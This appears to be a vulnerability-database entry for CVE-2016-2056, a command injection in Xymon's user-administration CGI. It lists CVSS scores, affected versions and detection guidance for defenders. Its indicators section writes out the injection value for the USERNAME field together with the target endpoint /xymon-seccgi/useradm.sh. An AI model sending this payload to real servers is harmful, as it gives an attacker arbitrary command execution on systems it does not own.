cbcvebase.
CVE-2016-2056
published 2016-04-13

CVE-2016-2056: xymond in Xymon 4.1.x, 4.2.x, and 4.3.x before 4.3.25 allow remote authenticated users to execute arbitrary commands via shell metacharacters in the…

PriorityP273high8.8CVSS 3.0
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
54.51%
98.9th percentile
xymond in Xymon 4.1.x, 4.2.x, and 4.3.x before 4.3.25 allow remote authenticated users to execute arbitrary commands via shell metacharacters in the adduser_name argument in (1) web/useradm.c or (2) web/chpasswd.c.

Affected

38 ranges· showing 25
VendorProductVersion rangeFixed in
debiandebian_linux
debianxymon< xymon 4.3.25-1 (bookworm)xymon 4.3.25-1 (bookworm)
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon
xymonxymon

Detection & IOCsextracted from sources · hover to see the quote

url/xymon-seccgi/useradm.sh
path/xymon-seccgi/
commandUSERNAME=';${cmd} & echo '&PASSWORD=&SendCreate=Create
pathweb/useradm.c
pathweb/chpasswd.c
  • Detect HTTP POST requests to /xymon-seccgi/useradm.sh containing shell metacharacters (e.g. single-quote, semicolon, ampersand) in the USERNAME parameter, which is the injection vector used to escape the htpasswd system() call.
  • Alert on HTTP 500 responses from /xymon-seccgi/useradm.sh following an authenticated POST — the exploit module treats a 500 response as confirmation of successful payload delivery.
  • Monitor for authenticated HTTP GET requests to /xymon-seccgi/useradm.sh as a reconnaissance/version-check step prior to exploitation; the module probes this endpoint to fingerprint the Xymon version before attempting command injection.
  • Flag web server processes (e.g. Apache/nginx CGI workers) spawning unexpected child processes such as shells or network utilities, as the injected command executes as the web server user via a system() call in useradm.sh.
  • ·Exploitation requires valid HTTP Basic Auth credentials for the Xymon web interface; unauthenticated attackers cannot reach the vulnerable endpoint.
  • ·The injected command executes with web server user privileges only, not root; post-exploitation privilege escalation would be a separate step.
  • ·The Metasploit payload has bad characters \x00, \x0A, \x0D (null byte, LF, CR) which will break injection if present in the command string; detection rules should account for URL-encoded variants.
  • ·The default TARGETURI is /xymon-seccgi/ but may differ across installations; detections scoped only to this path may miss non-default deployments.

CVSS provenance

nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
osv8.8HIGH
vendor_debian8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.